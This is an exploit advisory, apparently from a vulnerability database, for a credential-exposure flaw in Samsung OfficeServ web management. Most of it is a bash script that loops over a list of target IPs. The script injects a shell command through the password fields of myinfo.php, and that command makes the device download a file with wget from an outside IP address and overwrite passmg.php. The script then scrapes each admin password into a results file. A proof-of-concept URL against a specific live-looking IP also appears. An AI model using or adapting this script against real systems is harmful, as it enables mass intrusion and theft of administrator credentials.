Samsung Officeserv Read the users/passwords

2013-05-10 / 2013-05-11
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Title:samsung officeserv Read the users/passwords # Author: MaDo Mokhtar # Contact: codezeroooo[at]yahoo[dot]com # Vendor: http://www.samsung.com # Version: Web Management V 4.12th 2010.04 - Introduction: This converged communication system provides voice, data, wireline, and wireless solutions. Combining its expertise in wireless, communications, core networks, digital technology and IP functionality, Samsung brings you the OfficeServ converged communication system. As a completely converged platform, OfficeServ supports both voice and data communication with powerful, IP-based wired and wireless flexibility. - Vulnerability Explanation: some coders are so stupid.They save the usernames and passwords in text files,UNPROTECTED. - Vulnerable Code Snippet at /contents/general/passwd/passmg.php - Proof of Concept: https://201.192.234.66/contents/general/passwd/passmg.php https://[ip]/contents/general/passwd/passmg.php Bash script to grep the password ===================== #! /bin/bash filecon=(` cat $1 `) for ip in "${filecon[@]}" do echo $ip curl -m3 --insecure --data "sSMELoginID=admin&action=save&passwd1=any+%26%26+%2Fusr%2Fbin%2Fsudo+wget+http%3A%2F%2F85.25.134.46%2Fpassmg.txt+-O+%2Fusr%2Flocal%2Fwww%2Fcontents%2Fgeneral%2Fpasswd%2Fpassmg.php&passwd2=any+%26%26+%2Fusr%2Fbin%2Fsudo+wget+http%3A%2F%2F85.25.134.46%2Fpassmg.txt+-O+%2Fusr%2Flocal%2Fwww%2Fcontents%2Fgeneral%2Fpasswd%2Fpassmg.php" https://${ip}/login/myinfo.php >> tmp.tmp res=$(curl -m3 --insecure https://${ip}/contents/general/passwd/passmg.php | grep old_passwd_0 | cut -d'"' -f6) echo $res echo "found: "${ip}" >> admin <> "$res" <<" >> foserv.res done - Credits: MaDo Mokhtar


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top